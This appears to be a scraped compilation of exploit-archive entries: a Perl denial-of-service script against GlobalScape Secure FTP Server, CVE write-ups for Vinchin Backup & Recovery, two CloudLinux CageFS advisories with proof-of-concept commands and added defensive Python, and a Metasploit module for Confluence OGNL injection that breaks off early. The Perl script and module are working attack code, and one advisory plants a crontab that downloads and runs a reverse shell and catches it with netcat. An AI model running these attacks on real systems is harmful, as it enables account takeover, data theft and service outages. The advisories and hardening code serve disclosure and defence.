<pre><code>#!/usr/bin/perl<br />use strict;<br />use warnings;<br />use IO::Socket;<br /><br />print "GlobalScape Secure FTP Server 3.0 - Denial of Service\n";<br /><br /># 147 copies of a four-byte pattern, appended to the oversized line sent after login<br />my $payload = "\x41\x42\x0a\x00" x 147;<br /><br />my $buffer = "\x41" x 2043 . "\x41\x42\x43\x00" . "\x42" x 36 . $payload;<br /><br />my $sock = IO::Socket::INET->new(PeerAddr => '192.168.0.10', PeerPort => 21, Proto => 'tcp');<br />if ($sock) {<br />    print "[+] Connected to FTP server\n";<br />    print "[+] Sending Username\n";<br />    print $sock "USER anonymous\r\n";<br />    print "[+] Sending Password\n";<br />    print $sock "PASS anonymous\r\n";<br />    print "[+] Sending payload to exploit\n";<br />    print $sock $buffer . "\r\n";<br />    print "[+] Exploit!\n";<br />    close($sock);<br />} else {<br />    print "Can't connect to FTP: $!\n";<br />}<br /></code></pre>
<pre><code>CVE ID: CVE-2024-22903<br /><br />Title: Command Injection Vulnerability in SystemHandler.class.php of Vinchin Backup & Recovery Versions 7.2 and Earlier<br /><br />Description:<br />A significant security vulnerability, CVE-2024-22903, has been identified in the `deleteUpdateAPK` function within the `SystemHandler.class.php` file of Vinchin Backup & Recovery software, affecting versions 7.2 and earlier. This function, designed to delete APK files, is prone to a command injection vulnerability due to improper handling of input parameters.<br /><br />Function Analysis:<br />- The function extracts `md5` and `file_name` parameters from user input.<br />- It includes a check for an empty `file_name`, but lacks adequate validation or sanitization for the input used in constructing system commands.<br />- The command to delete the specified APK file, built using the `file_name` parameter, is executed via the `exec` function, leading to a security vulnerability.<br /><br />Exploitation Risk:<br />Attackers can exploit this flaw by inserting malicious commands in the `file_name` parameter. When this parameter is processed by the vulnerable function, the injected commands are executed on the server, presenting a severe risk of unauthorized access or control.<br /><br />Current Status:<br />As of the latest information, there is no known patch available for this vulnerability in versions 7.2 and earlier of Vinchin Backup & Recovery.<br /><br />Recommendation:<br />Users are urged to be vigilant and to monitor Vinchin for any security updates. Until a patch is released, implementing additional security controls and closely monitoring system activity is crucial for mitigating the risk posed by this vulnerability.<br /><br />Signed, Valentin Lobstein<br /><br /></code></pre>
<pre><code>CVE ID: CVE-2024-22902<br /><br />Title: Default Root Credentials Vulnerability in Vinchin Backup & Recovery v7.2<br /><br />Suggested Description:<br />Vinchin Backup & Recovery version 7.2 has been identified as being configured with default root credentials, posing a significant security vulnerability.<br /><br />Additional Information:<br />There is no documentation or guidance from Vinchin on changing the root password for this version. The use of password authentication as root is possible, leading to potential unauthorized access.<br /><br />Vulnerability Type:<br />Incorrect Access Control<br /><br />Vendor of Product:<br />Vinchin<br /><br />Affected Product Code Base:<br />Vinchin - Version 7.2<br /><br />Attack Type:<br />Remote<br /><br />Impact - Escalation of Privileges:<br />True<br /><br />Attack Vectors:<br />This security flaw can be exploited through both local and remote access using the default root credentials provided in the software.<br /><br />Discoverer:<br />Valentin Lobstein<br /><br />References:<br />- http://vinchin.com<br /><br />Conclusion:<br />The existence of default root credentials in Vinchin Backup & Recovery v7.2 (CVE-2024-22902) is a serious security oversight. Users of this software version should be aware of the risks and stay alert for any updates or security patches from Vinchin. Immediate action should be taken to change these credentials to prevent unauthorized access.<br /><br />Signed, Valentin Lobstein<br /><br /></code></pre>
<pre><code>CVE ID: CVE-2024-22901<br /><br />Title: Default MYSQL Credentials Vulnerability in Vinchin Backup & Recovery v7.2<br /><br />Description:<br />A critical security issue, identified as CVE-2024-22901, has been discovered in Vinchin Backup & Recovery version 7.2. The software has been found to use default MYSQL credentials, which could lead to significant security risks.<br /><br />Additional Information:<br />Vinchin has not addressed previous disclosures, including CVE-2022-35866, and has not patched the reported vulnerabilities. The presence of these unresolved issues, now compounded by the newly discovered vulnerability of default MYSQL credentials, opens up potential avenues for easy unauthenticated Remote Code Execution (RCE). This lack of response is alarming for a product that is certified in cybersecurity and poses a considerable risk to its users.<br /><br />Vulnerability Type:<br />Incorrect Access Control<br /><br />Vendor of Product:<br />Vinchin<br /><br />Affected Product Code Base:<br />Vinchin Backup & Recovery - Version 7.2<br /><br />Affected Component:<br />The MySQL database used by Vinchin Backup & Recovery<br /><br />Attack Type:<br />Remote<br /><br />Impact - Escalation of Privileges:<br />True<br /><br />Attack Vectors:<br />The vulnerability can be exploited via local or remote access, utilizing the unpatched default MySQL credentials.<br /><br />Discoverer:<br />Valentin Lobstein<br /><br />Reference:<br />http://vinchin.com<br /><br />Conclusion:<br />The discovery of CVE-2024-22901 highlights a critical oversight in Vinchin Backup & Recovery's security posture. Users are advised to be cautious and to monitor for any updates or patches from Vinchin, which should be applied immediately to mitigate this risk.<br /><br />Signed, Valentin Lobstein<br /><br /></code></pre>
<pre><code>CVE ID: CVE-2024-22899<br /><br />Title: Command Injection Vulnerability in Vinchin Backup and Recovery's syncNtpTime Function in Versions 7.2 and Earlier<br /><br />Description:<br />A critical security vulnerability, identified as CVE-2024-22899, has been discovered in the `syncNtpTime` function of Vinchin Backup and Recovery software. This issue affects versions 7.2 and earlier. The function, part of the `SystemHandler.class.php` file, is designed for synchronizing system time with NTP servers but is prone to a command injection vulnerability due to improper handling of user input.<br /><br />Function Analysis:<br />- The function is responsible for handling the `ntphost` parameter, which is expected to contain the address of the NTP server.<br />- The vulnerability stems from the direct concatenation of this parameter into a system command line, without adequate validation or sanitization.<br />- This design flaw allows an attacker to inject arbitrary commands into the `ntphost` parameter, which are then executed by the system.<br /><br />Current Status:<br />As of now, there is no patch available for this vulnerability in versions 7.2 and earlier of Vinchin Backup and Recovery. Users of these versions are at risk of exploitation.<br /><br />Recommendation:<br />It is advised for users of Vinchin Backup and Recovery versions 7.2 and earlier to remain alert and monitor for updates from Vinchin. Once a patch becomes available, it should be applied immediately to mitigate the risk posed by this vulnerability.<br /><br />Conclusion:<br />The discovery of CVE-2024-22899 underscores the importance of rigorous input validation and sanitization in software development. This vulnerability poses a severe security risk, potentially leading to unauthorized system access or control.<br /><br />Signed, Valentin Lobstein<br /><br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA256<br /><br /># CloudLinux CageFS Insufficiently Restricted Proxy Command #<br /><br />Link: https://github.com/sbaresearch/advisories/tree/public/2020/SBA-ADV-20200707-02_CloudLinux_CageFS_Insufficiently_Restricted_Proxy_Commands<br /><br />## Vulnerability Overview ##<br /><br />CloudLinux CageFS 7.0.8-2 or below insufficiently restricts file paths<br />supplied to the `sendmail` proxy command. This allows local users to read<br />and write arbitrary files of certain file formats outside the CageFS<br />environment.<br /><br />* **Identifier** : SBA-ADV-20200707-02<br />* **Type of Vulnerability** : External Control of File Name or Path<br />* **Software/Product Name** : [CloudLinux CageFS](https://www.cloudlinux.com/)<br />* **Vendor** : CloudLinux Inc.<br />* **Affected Versions** : <= 7.0.8-2<br />* **Fixed in Version** : 7.1.1-1<br />* **CVE ID** : CVE-2020-36772<br />* **CVSS Vector** : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L<br />* **CVSS Base Score** : 6.6 (Medium)<br /><br />## Vendor Description ##<br /><br />> CloudLinux OS is the leading platform for multitenancy. It improves<br />> server stability, density, and security by isolating each tenant and<br />> giving them allocated server resources. This creates an environment<br />> that feels more like a virtual server than a shared hosting account.<br />> By doing so, CloudLinux OS reduces operating costs and churn rates,<br />> and increases profitability.<br /><br />Source: <https://www.cloudlinux.com/><br /><br />## Impact ##<br /><br />A CageFS-restricted local user can read and write arbitrary files of certain<br />file formats outside the CageFS environment by exploiting the vulnerability<br />documented in this advisory.<br /><br />## Vulnerability Description ##<br /><br />CloudLinux offers a feature called proxy commands in CageFS environments.<br />It allows limited execution of commands outside the CageFS environment from<br />a user restricted within the CageFS environment.<br /><br />In its default configuration, CageFS allows `sendmail` to be executed as a<br />proxy command outside the CageFS environment. This default configuration is<br />designed to allow local programs to send emails by invoking `sendmail`.<br />Due to the insufficient validation of sendmail's arguments, an attacker can<br />invoke other sendmail functionality as well. While CageFS applies some<br />restrictions to the allowed arguments, it does not restrict or validate the<br />`-bi` and `-oA` arguments.<br /><br />Therefore, an attacker can have `sendmail` access arbitrary files, which will<br />be interpreted as alias database files, by enabling the `newalias` mode of<br />`sendmail` with `-bi` and specifying a file located outside the CageFS<br />environment with `-oA`.<br /><br />On systems using the Postfix to Sendmail compatibility interface, a great<br />number of different alias database types can be used to craft exploits.<br />The compatibility interface internally calls `postalias` and, besides the<br />`-oA` argument already being dangerous by itself, it also suffers from an<br />argument injection issue, which allows injection of additional Postfix<br />specific arguments for `postalias`. However, this is not a security issue<br />in Postfix.<br /><br />According to Postfix developers, Postfix's `sendmail` does not enforce a<br />security policy on command-line arguments. Instead, it relies on the<br />UNIX/Linux system to enforce access policies based on the effective user and<br />group IDs of the process. If a security policy should be enforced, the<br />calling process must sanitize the command-line arguments before they are<br />given to `sendmail`. This includes but is not limited to sanity checks on<br />pathnames, and if applicable sanity checks on file contents in a way that<br />is not vulnerable to time-of-check to time-of-use race attacks, and<br />disabling options processing with `--`.<br /><br />## Proof of Concept ##<br /><br />For example, an attacker can read arbitrary files that at least partially<br />follow the structure `key <whitespace> value` via the lookup table type<br />`texthash`:<br /><br />```sh<br />$ sendmail -bi -oA'-s,-f,texthash:/etc/passwd'<br />postalias: warning: /etc/passwd, line 1: expected format: key whitespace value -- ignoring this line<br />[...]<br />postalias: warning: /etc/passwd, line 211: expected format: key whitespace value -- ignoring this line<br />sssd:x:496:493:User: for sssd:/:/sbin/nologin<br />dbus:x:81:81:System: message bus:/:/sbin/nologin<br />polkitd:x:497:495:User: for polkitd:/:/sbin/nologin<br />tss:x:59:59:Account: used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin<br />systemd-resolve:x:193:193:systemd: Resolver:/:/sbin/nologin<br />rngd:x:494:491:Random: Number Generator Daemon:/var/lib/rngd:/sbin/nologin<br />sshd:x:74:74:Privilege-separated: SSH:/var/empty/sshd:/sbin/nologin<br />systemd-coredump:x:499:497:systemd: Core Dumper:/:/sbin/nologin<br />nobody:x:65534:65534:Kernel: Overflow User:/:/sbin/nologin<br />ftp:x:14:50:FTP: User:/var/ftp:/sbin/nologin<br />unbound:x:498:496:Unbound: DNS resolver:/etc/unbound:/sbin/nologin<br />nrpe:x:492:486:NRPE: user for the NRPE service:/var/run/nrpe:/sbin/nologin<br />```<br /><br />The attacker can also use other lookup table types which might disclose<br />sensitive information. For example, `unix` allows the query of specific<br />users regardless of the format:<br /><br />```sh<br />$ sendmail -bi -oA'-q,ftp2406151,unix:passwd.byname'<br />ftp2406151:x:935:935::/home/ftp2406151:/sbin/nologin<br />```<br /><br />An attacker can also write specific file formats outside the CageFS<br />environment. For example, with the `hash` lookup table type:<br /><br />```sh<br />$ echo sba:was_here | sendmail -bi -oA'-o,-p,-i,-f,hash:/tmp/sba_was_here'<br />$ sendmail -bi -oA'-s,-f,hash:/tmp/sba_was_here'<br />@: @<br />YP_LAST_MODIFIED: 1594138203<br />YP_MASTER_NAME: localhost<br />sba: was_here<br />```<br /><br />## Recommended Countermeasures ##<br /><br />We recommend restricting the `sendmail` command to only the strictly required<br />parameters using an allow-list approach. At least the following parameters<br />are known to cause dangerous behavior:<br /><br />* `-oA`: Allows specification of multiple paths and additional arguments.<br /> It is important to consider that it is directly followed by the pathname<br /> without a separator, e.g., `-oA/etc/passwd`.<br />* `-bi`: Enables the `newalias` mode of `sendmail`.<br />* `-I`: Enables the `newalias` mode of `sendmail`.<br />* `-v`: If the parameter is added at least two times, i.e., `-vv`,<br /> `-vvvvv` or `-v -v`, it enables the verbose mode, which leaks the<br /> Postfix configuration in some cases.<br /><br />We did not fully analyze other parameters of `sendmail`; therefore, it is<br />possible that `sendmail` as a proxy command is also prone to other attacks.<br /><br />## Timeline ##<br /><br />* `2020-07-07`: identification of vulnerability in version 7.0.6-1<br />* `2020-07-10`: initial vendor contact<br />* `2020-07-13`: initial vendor response<br />* `2020-07-13`: disclosed vulnerability to vendor security contact<br />* `2020-08-06`: vendor released version 7.1.1-1 to testing<br />* `2020-09-03`: vendor released version 7.1.1-1 to production<br />* `2020-10-02`: request CVE from MITRE<br />* `2022-01-04`: MITRE declined request as it falls in the scope of Red Hat<br />* `2024-01-19`: request CVE from Red Hat<br />* `2024-01-22`: Red Hat assigned CVE-2020-36772<br />* `2024-01-25`: public disclosure<br /><br />## References ##<br /><br />* CageFS 7.1.1-1 beta: <https://blog.cloudlinux.com/beta-cagefs-and-alt-python27-cllib-updated-1><br />* CageFS 7.1.1-1 production: <https://blog.cloudlinux.com/lve-manager-lve-stats-lve-utils-and-alt-python27-cllib-have-been-rolled-out-to-100><br /><br />## Credits ##<br /><br />* David Lisa Gnedt ([SBA Research](https://www.sba-research.org/))<br />-----BEGIN PGP SIGNATURE-----<br /><br />iQIzBAEBCAAdFiEEL9Wp/yZWFD9OpIt6+7iGL1j3dbIFAmWyn0kACgkQ+7iGL1j3<br />dbL5PhAAspmKHEa29DXuwNjJ/3l96fX2AiuPj5NDhoSF01tfakpNE0w86c8GiGvw<br />GRhGQ0n1AO9qNcfyULjWjtQ8FwFuRPzPI0mfaycW2oDQ3BAG2LtFqmQvpUzTV6tP<br />pckL2H50ptablRYlphFEY0XDt42ezU3wjokNK/cpRhZlzCs7mvd6LuCg5qXwBno/<br />srsxlb4n1IdZRF5mh7ariYpObDvLUctwhri7RCBEqb6MZh+y6rSSPKsGdCHq/su2<br />6KEH0mxNPwMJtccNah29SWvv+fZ9+mkK1IuuWIdhyM2XMTJxOE4n0AsoISVGI6bH<br />9XgL0AQ3B3kyoqHbfCyoUonbz4mSdTFInqpuqlU0X6Wos+kjnS/27sH/De8ba+mm<br />jmDDQFmoe1QrVkbDjXI7zBy81Qh3nVZ/qig/1SCex0i+IyO4HpdCYbjrs7I76C0V<br />fvpd0VWb3BKpGHA4IhISA/jmCSlvxW+2gkHrhxfWhM1K3Pa/a0qH9RuCFAZ7B9qP<br />OQM3Yrhbikqyaqh/ZI7nYMc33KfiPCiXKejDtaTGIVVThKHr1mQibgaYt+ILi0RH<br />8uxH+tpuVqjEgVHZQMBQEAa3WvaGYo2kJJxU0z+3m/s6W45JhGguMzrH/n9z6XKo<br />H4xyTp1YQ3aP6gZBgoMEkipkc0B+QK/zb+xOghfE3Cbjdx47gCo=<br />=E60q<br />-----END PGP SIGNATURE-----<br /><br /></code></pre>
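The allow-list approach recommended in the countermeasures above, as an added example that is not part of the advisory and not CloudLinux's CageFS or proxyexec code: a Python validator that a proxy wrapper could run over the argument vector before forwarding it to the real `sendmail`. The permitted options (`-t`, `-i`, `-oi`, `-f` with an address value, and a single `-v`) are an assumption for this example; the rejections follow the advisory's list, including the prefix match that `-oA/etc/passwd` requires and the cumulative count that catches `-v -v`, and `--` is appended so operands can never be parsed as options.

```python
"""Allow-list validation for arguments forwarded to a sendmail proxy command.

Added example for the countermeasures in SBA-ADV-20200707-02; illustrative
code, not CloudLinux's CageFS or proxyexec implementation. The set of
permitted options is an assumption chosen for this example.
"""
import re

# Options that take no value and that local mail clients commonly need
# (assumed allow list; anything not listed here is rejected).
ALLOWED_FLAGS = {"-t", "-i", "-oi"}

# Options that take exactly one following value, with a validator for it.
# Only -f (envelope sender) is assumed to be required here.
ADDRESS_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+$")
ALLOWED_VALUE_FLAGS = {"-f": ADDRESS_RE}


def validate_sendmail_args(args):
    """Return (ok, reason, forwarded_argv).

    forwarded_argv is what the proxy should pass to the real sendmail:
    validated options, then '--' so that recipients can never be parsed
    as options, then validated recipient addresses.
    """
    options = []
    recipients = []
    verbose_count = 0
    i = 0
    while i < len(args):
        arg = args[i]
        if arg == "--":
            # Everything after '--' is an operand; it is validated below.
            recipients.extend(args[i + 1:])
            break
        if arg.startswith("-"):
            # -oA is followed by its path without a separator (-oA/etc/passwd),
            # so it must be matched as a prefix, not as a whole option.
            if arg.startswith("-oA"):
                return False, "alias database override (-oA) is not allowed", []
            if arg in ("-bi", "-I"):
                return False, "newaliases mode (-bi/-I) is not allowed", []
            if re.fullmatch(r"-v+", arg):
                # -vv, -vvvvv and -v -v all enable verbose mode: count every v.
                verbose_count += len(arg) - 1
                if verbose_count >= 2:
                    return False, "repeated -v (verbose mode) is not allowed", []
                options.append(arg)  # a single -v is assumed to be acceptable
                i += 1
                continue
            if arg in ALLOWED_FLAGS:
                options.append(arg)
                i += 1
                continue
            if arg in ALLOWED_VALUE_FLAGS:
                if i + 1 >= len(args):
                    return False, f"{arg} requires a value", []
                value = args[i + 1]
                if value.startswith("-") or not ALLOWED_VALUE_FLAGS[arg].fullmatch(value):
                    return False, f"invalid value for {arg}: {value!r}", []
                options.extend([arg, value])
                i += 2
                continue
            return False, f"option {arg!r} is not on the allow list", []
        recipients.append(arg)
        i += 1

    for rcpt in recipients:
        if not ADDRESS_RE.fullmatch(rcpt):
            return False, f"invalid recipient {rcpt!r}", []
    return True, "ok", options + ["--"] + recipients


if __name__ == "__main__":
    # Constructed sample invocations, including the option forms the advisory names.
    samples = [
        ["-t", "-i"],
        ["-f", "app@example.org", "user@example.org"],
        ["-bi", "-oA-s,-f,texthash:/etc/passwd"],
        ["-oA/etc/passwd"],
        ["-v", "-v"],
        ["--", "-bi"],
    ]
    for argv in samples:
        ok, reason, forwarded = validate_sendmail_args(argv)
        verdict = "forward" if ok else "reject"
        print(f"{' '.join(argv):45s} -> {verdict}: {forwarded if ok else reason}")
```

A wrapper would call `validate_sendmail_args(sys.argv[1:])` and execute the real `sendmail` only with the returned vector, never with the raw one; the reason string is what belongs in the audit log when a call is refused.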
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA256<br /><br /># CloudLinux CageFS Token Disclosure #<br /><br />Link: https://github.com/sbaresearch/advisories/tree/public/2020/SBA-ADV-20200707-01_CloudLinux_CageFS_Token_Disclosure<br /><br />## Vulnerability Overview ##<br /><br />CloudLinux CageFS 7.1.1-1 or below passes the authentication token as a<br />command line argument. In some configurations this allows local users to<br />view the authentication token via the process list and gain code execution<br />as another user.<br /><br />* **Identifier** : SBA-ADV-20200707-01<br />* **Type of Vulnerability** : Invocation of Process Using Visible Sensitive Information<br />* **Software/Product Name** : [CloudLinux CageFS](https://www.cloudlinux.com/)<br />* **Vendor** : CloudLinux Inc.<br />* **Affected Versions** : <= 7.1.1-1<br />* **Fixed in Version** : 7.1.2-2<br />* **CVE ID** : CVE-2020-36771<br />* **CVSS Vector** : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H<br />* **CVSS Base Score** : 7.8 (High)<br /><br />## Vendor Description ##<br /><br />> CloudLinux OS is the leading platform for multitenancy. It improves<br />> server stability, density, and security by isolating each tenant and<br />> giving them allocated server resources. This creates an environment<br />> that feels more like a virtual server than a shared hosting account.<br />> By doing so, CloudLinux OS reduces operating costs and churn rates,<br />> and increases profitability.<br /><br />Source: <https://www.cloudlinux.com/><br /><br />## Impact ##<br /><br />If the `lve_namespaces` service or the virtualized proc filesystem<br />feature is disabled, a local user can obtain the CageFS authentication<br />token of other users by exploiting the vulnerability documented in this<br />advisory. In most configurations this allows attackers to gain code<br />execution as those users.<br /><br />## Vulnerability Description ##<br /><br />CloudLinux offers a feature called proxy commands in CageFS environments.<br />It allows limited execution of commands outside the CageFS environment from<br />a user restricted within the CageFS environment.<br /><br />For this purpose, a CageFS daemon runs outside of the CageFS environment;<br />it is accessible via a UNIX socket from within the CageFS environment.<br />The UNIX socket is handled by `proxyexec`. To make the whole process of<br />calling a tool outside of the CageFS transparent to the user, wrapper<br />scripts are placed within CageFS, which in turn call `proxyexec` for<br />execution of the commands outside of the CageFS environment.<br /><br />Those wrapper scripts read the CageFS token from `/var/.cagefs/.cagefs.token`<br />and pass it to the `proxyexec` command as a command line argument.<br /><br />CloudLinux by default enables the virtualized proc filesystem, which<br />prevents other users from seeing the CageFS token within the process<br />list. However, if the `lve_namespaces` service is disabled, e.g. the<br />systemd unit is masked out, or the virtualized proc filesystem is<br />explicitly disabled, other users can see the CageFS token within the<br />process list. They can use the CageFS token of other users to talk to<br />the CageFS daemon via `proxyexec`, and the CageFS daemon executes the<br />commands with the privileges of the supplied authentication token.<br /><br />## Proof of Concept ##<br /><br />Let's assume the `lve_namespaces` service is disabled and we are user<br />`ftp2406151`:<br /><br />```sh<br />$ id<br />uid=935(ftp2406151) gid=935(site2406151) groups=935(site2406151)<br />```<br /><br />We list the process list and find another user executing `ping example.org`:<br /><br />```sh<br />$ ps aux | grep proxyexec<br /> 2094 root 0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server<br />1180646 934 0:00 /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / PING 1180642 example.org<br />1180647 root 0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server<br />1181229 ftp24061 0:00 grep proxyexec<br />```<br /><br />We can now execute commands as user `ftp1488781` and, for example, view<br />the crontab:<br /><br />```sh<br />$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0<br />no crontab for ftp1488781<br />```<br /><br />Now we set up a new crontab entry, which downloads a reverse shell and<br />executes it every minute:<br /><br />```sh<br />$ echo '* * * * * wget -q -O rshell https://www.example.org/rshell && chmod +x rshell && nohup ./rshell &' | /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_SAVE 0<br />```<br /><br />```sh<br />$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0<br />* * * * * wget -q -O rshell https://www.example.org/rshell && chmod +x rshell && nohup ./rshell &<br />```<br /><br />Our shell connects back to us and we can execute arbitrary commands as<br />the other user:<br /><br />```sh<br />$ nc -l -p 1234<br />id<br />uid=934(ftp1488781) gid=934(site1488781) groups=934(site1488781)<br />```<br /><br />## Recommended Countermeasures ##<br /><br />We recommend not passing sensitive information as a command line<br />argument. Instead, `proxyexec` should directly read the CageFS token<br />from the file `/var/.cagefs/.cagefs.token` and pass it to the CageFS<br />daemon via the UNIX socket.<br /><br />## Timeline ##<br /><br />* `2020-07-07`: identification of vulnerability in version 7.0.6-1<br />* `2020-07-10`: initial vendor contact<br />* `2020-07-13`: initial vendor response<br />* `2020-07-13`: disclosed vulnerability to vendor security contact<br />* `2020-09-02`: vendor released version 7.1.2-2 to testing<br />* `2020-09-28`: vendor released version 7.1.2-2 to production<br />* `2020-10-02`: request CVE from MITRE<br />* `2022-01-04`: MITRE declined request as it falls in the scope of Red Hat<br />* `2024-01-19`: request CVE from Red Hat<br />* `2024-01-22`: Red Hat assigned CVE-2020-36771<br />* `2024-01-25`: public disclosure<br /><br />## References ##<br /><br />* CloudLinux OS Documentation. Virtualized /proc filesystem: <https://docs.cloudlinux.com/shared/cloudlinux_os_kernel/#virtualized-proc-filesystem><br />* CageFS 7.1.2-2 beta: <https://blog.cloudlinux.com/beta-cagefs-lve-wrappers-and-bsock-updated><br />* CageFS 7.1.2-2 production: <https://blog.cloudlinux.com/cagefs-lve-wrappers-and-bsock-have-been-rolled-out-to-100><br /><br />## Credits ##<br /><br />* David Lisa Gnedt ([SBA Research](https://www.sba-research.org/))<br />-----BEGIN PGP SIGNATURE-----<br /><br />iQIzBAEBCAAdFiEEL9Wp/yZWFD9OpIt6+7iGL1j3dbIFAmWynusACgkQ+7iGL1j3<br />dbKzLhAAwKYUzx9v+tPeTNNUUrgxibQSZIhtxcvpdfYTFQAm+Rj71F8g+FZIqV0D<br />5uMjUtutldd1Mh9YfEQ5hGbOawYqnfL9tebEX1SqdbraSD3r4tQEAMowgBMREpFJ<br />DgUyIVTSnFVTQqcai2wpObPRgs397qM8mrykH5rAKdLD1kBfpULq7Duec62E740u<br />Ay4YiIiO0OZWf7WElH3KunICE/Sv4TzqZ3DEIlSsQZQv8zM5r44O93FhMiMO6n3R<br />pKfK8F4ub2y4e3gkW1uaoGO7ZwAW3aR+F5FAi6R5MJXm0RxIibL9tqCyVVrlXTS6<br />BZiFzsE9ATSSMGVGGH6O6rb1KXXXTc5jopEjGbQgWMKmZn+NK4yHzITFydzJi04P<br />oaoQmbBWyN4OdfGApvUomyqPp6uUE+i1RfniHq+7vmIR5I7D/KsLQorYonmwD/26<br />b5BQ99M7sNGHlWbt1vn9imtDj+nw9JTK2425t6swJOc4QPxdKQtx6hESvRJHiPer<br />M3VFmgj9c19mXQb2B+k+GgM4h7lrhvOyWGreWo1sOBtwcLX7i3zqkCOqowI3DedE<br />cWV2qjNqTUqM4EMn6Gx5Rf32Kp6e1Jj0GXmMl7TVY5taBSyQ7UXPJkLT6MfyM1v6<br />hf5wIsINv1dNRQxpWgXiDvZ+d0AdSNxYfRZFe1wyQIKQbwLYm6w=<br />=d1f0<br />-----END PGP SIGNATURE-----<br /><br /></code></pre>
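The countermeasure above (read the token from its file and send it in-band over the UNIX socket, never on the command line), as an added example that is not part of the advisory and not CloudLinux's proxyexec or CageFS daemon code. The client side reads a mode-0600 token file and sends the token inside its request; the daemon side looks up the expected token for the named user and authorizes the command only after a constant-time comparison. Both sides are driven over an in-process socket pair so the exchange runs offline. The one-JSON-line request format, the file name and the sample user and token values are assumptions; `leaky_client_argv` reproduces the argv shape the advisory's `ps` output shows, and the check beside it is the kind of test a reviewer would run against a wrapper script.

```python
"""Authenticating a proxied command with a token read from a file, not argv.

Added example for the countermeasures in SBA-ADV-20200707-01; illustrative
code, not CloudLinux's proxyexec or CageFS daemon. The JSON line protocol,
the token file name and the sample values are assumptions.
"""
import hmac
import json
import os
import socket
import tempfile


def write_token_file(directory, token):
    """Store a per-user token readable only by its owner (mode 0600)."""
    path = os.path.join(directory, ".cagefs.token")  # file name taken from the advisory
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(token + "\n")
    return path


def read_token(path):
    with open(path) as fh:
        return fh.read().strip()


def leaky_client_argv(user, token, command):
    """The shape the advisory describes: the secret is visible in the process list."""
    return ["proxyexec", "-c", "cagefs.sock", user, token, "/", command]


def safe_client_argv(user, command):
    """Hardened shape: argv carries no secret; the token travels over the socket."""
    return ["proxyexec", "-c", "cagefs.sock", user, "/", command]


def token_visible_in_cmdline(argv, token):
    """Detection helper: would this command line expose the token to `ps`?"""
    return any(token in part for part in argv)


def client_send(sock, token_path, user, command):
    """Client side: read the token from the file and send it with the request."""
    request = {"user": user, "token": read_token(token_path), "command": command}
    sock.sendall((json.dumps(request) + "\n").encode())


def server_handle(sock, lookup_token):
    """Daemon side: authorize the request against the token on file for that user.

    lookup_token(user) returns the expected token, or '' for unknown users.
    The command is only authorized after a constant-time comparison.
    """
    raw = b""
    while not raw.endswith(b"\n"):
        chunk = sock.recv(4096)
        if not chunk:
            break
        raw += chunk
    request = json.loads(raw.decode())
    user = request.get("user", "")
    expected = lookup_token(user)
    supplied = request.get("token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return {"authorized": False, "user": user, "command": None}
    return {"authorized": True, "user": user, "command": request.get("command")}


def run_exchange(stored_token, client_token, user="user1", command="CRONTAB_LIST"):
    """One client/daemon round trip over an in-process socket pair.

    stored_token is what the daemon holds for `user`; client_token is what the
    client's token file contains (they differ in the failure case).
    """
    with tempfile.TemporaryDirectory() as tmp:
        token_path = write_token_file(tmp, client_token)
        client_sock, server_sock = socket.socketpair()
        try:
            client_send(client_sock, token_path, user, command)
            client_sock.shutdown(socket.SHUT_WR)
            return server_handle(server_sock, lambda u: stored_token if u == user else "")
        finally:
            client_sock.close()
            server_sock.close()


if __name__ == "__main__":
    print(run_exchange("tok-example-0001", "tok-example-0001"))
    print(run_exchange("tok-example-0001", "not-the-token"))
    print(token_visible_in_cmdline(leaky_client_argv("user1", "tok-example-0001", "CRONTAB_LIST"), "tok-example-0001"))
```

In a real deployment the daemon would also check that the connecting peer's UID (from `SO_PEERCRED` on the socket) matches the user named in the request, so that a token alone is never sufficient; that second factor is exactly what is lost when the token is readable from `/proc`.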
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br />  Rank = ExcellentRanking<br /><br />  prepend Msf::Exploit::Remote::AutoCheck<br />  include Msf::Exploit::Remote::HttpClient<br />  include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::Version<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'Atlassian Confluence SSTI Injection',<br />        'Description' => %q{<br />          This module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses<br />          the injection to evaluate an OGNL expression resulting in OS command execution.<br />          Versions 8.5.0 through 8.5.3 and 8.0 to 8.4 are known to be vulnerable.<br />        },<br />        'Author' => [<br />          'Rahul Maini', # ProjectDiscovery analysis<br />          'Harsh Jaiswal', # ProjectDiscovery analysis<br />          'Spencer McIntyre'<br />        ],<br />        'References' => [<br />          ['CVE', '2023-22527'],<br />          ['URL', 'https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html'],<br />          ['URL', 'https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/']<br />        ],<br />        'DisclosureDate' => '2024-01-16', # Atlassian advisory released<br />        'License' => MSF_LICENSE,<br />        'Platform' => ['unix', 'linux', 'win'],<br />        'Arch' => [ARCH_CMD],<br />        'Privileged' => false,<br />        'Targets' => [<br />          [<br />            'Unix Command',<br />            {<br />              'Platform' => 